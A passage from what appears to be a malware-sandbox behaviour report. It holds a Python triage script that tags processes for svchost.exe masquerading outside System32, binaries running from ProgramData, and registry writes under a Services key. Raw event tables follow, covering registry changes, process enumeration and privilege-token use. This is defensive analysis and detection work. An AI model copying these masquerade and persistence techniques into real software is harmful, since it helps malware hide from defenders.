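_PATH_SPLIT = re.compile(r" (?=[A-Za-z]:\\)")
# Description vocabulary seen in the tables; "N/A N/A" is the empty case.
_DESC = re.compile(
    r"^(N/A N/A|Key opened|Key created|Key deleted|Key value queried|"
    r"Set value \(\w+\)|File created|File opened for modification)\s*(.*)$"
)

SYSTEM_ONLY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
WRITABLE_ROOTS = ("c:\\programdata\\", "c:\\users\\public\\")
SERVICES_KEY = "\\registry\\user\\.default\\system\\currentcontrolset\\services"
INSTALLER_PROCS = {"drvinst.exe", "msiexec.exe"}
INSTALLER_NOISE = ("\\systemcertificates\\", "\\wintrust\\", "\\muicache\\")


@dataclass
class Row:
    description: str
    indicator: str
    process: str
    target: str


def parse_row(line: str) -> Row:
    """Split one flattened table row into its four columns."""
    text = line.strip()
    target = "N/A"
    if text.endswith(" N/A"):          # every row on this page has target N/A
        text = text[:-4]
    parts = _PATH_SPLIT.split(text)
    head = parts[0]
    process = parts[-1] if len(parts) > 1 else "N/A"
    m = _DESC.match(head)
    description, rest = (m.group(1), m.group(2)) if m else (head, "")
    indicator = " ".join([rest, *parts[1:-1]]).strip() or "N/A"
    if description == "N/A N/A":
        description = "N/A"
    return Row(description, indicator, process, target)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def flag_process(path: str) -> list[str]:
    """Tags based on where a process image lives, independent of what it did."""
    p = path.lower()
    tags = []
    if _basename(p) in SYSTEM_ONLY_NAMES and not p.startswith(SYSTEM_DIRS):
        tags.append("masquerade")
    if p.startswith(WRITABLE_ROOTS) or "\\appdata\\" in p:
        tags.append("writable-location")
    return tags


def flag_registry(row: Row) -> list[str]:
    """Tags for registry rows; key-based, not value-based, so the literal
    "Fatal" group string is not required for a hit."""
    key, proc = row.indicator.lower(), row.process.lower()
    if key.startswith(SERVICES_KEY) and not proc.startswith(SYSTEM_DIRS):
        return ["hku-services-write"]
    if _basename(proc) in INSTALLER_PROCS and any(n in key for n in INSTALLER_NOISE):
        return ["installer-noise"]
    return []


def triage(lines) -> dict[str, list[str]]:
    """Map each process path to the sorted set of tags it collected."""
    report: dict[str, set[str]] = {}
    for line in lines:
        if not line.strip():
            continue
        row = parse_row(line)
        tags = set(flag_process(row.process)) if row.process != "N/A" else set()
        if row.description.startswith(("Key", "Set value")):
            tags.update(flag_registry(row))
        if tags:
            report.setdefault(row.process, set()).update(tags)
    return {proc: sorted(t) for proc, t in report.items()}


# Constructed sample: rows copied verbatim from the tables on this page.
SAMPLE_ROWS = r"""
N/A N/A C:\ProgramData\setup\aa.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\Group = "Fatal" C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\InstallTime = "2025-02-21 23:08" C:\ProgramData\NVIDIARV\svchost.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fr.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
"""

if __name__ == "__main__":
    for proc, tags in triage(SAMPLE_ROWS.strip().splitlines()).items():
        print(f"{', '.join(tags):45} {proc}")
```

Run against the sample, the two ProgramData binaries and DrvInst.exe are the only processes that collect tags; GoogleUpdate.exe and MsiExec.exe fall through with nothing. The same parser handles the "File created" and "Key opened" rows, so the whole page can be fed through it, but note that the NLS\Language reads listed under "System Language Discovery" are made by cmd.exe, timeout.exe and msiexec.exe as well as the payload, so they are not worth a rule on their own.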

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ELEVATION C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.312\\goopdate.dll,-1004" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.svg C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromeHTML\Application\ApplicationCompany = "Google LLC" C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\NumMethods\ = "10" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\PROGID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\ = "IGoogleUpdate3WebSecurity" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ = "IPolicyStatus" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ = "ICurrentState" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{9465B4B4-5216-4042-9A2C-754D3BCDC410}\ServiceParameters = "/comsvc" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\NumMethods\ = "43" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82BB48E2-2057-4C07-A383-B2C2F8A0FD01} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\NumMethods\ = "24" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D656199B-93F2-4D64-AA2F-96BD3F18D40E} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods\ = "11" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.html C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E225E692-4B47-4777-9BED-4FD7FE257F0E}\ProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.312\\psmachine.dll" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\NumMethods\ = "5" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromeHTML\DefaultIcon C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithProgIds\ChromeHTML C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}\ProgID\ = "GoogleUpdate.Update3COMClassService.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\ = "IAppBundle" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\ = "IAppBundle" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher\CLSID\ = "{ABC01078-F197-4B0B-ADBC-CFE684B39C82}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods\ = "8" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods\ = "7" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\LocalServer32 C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
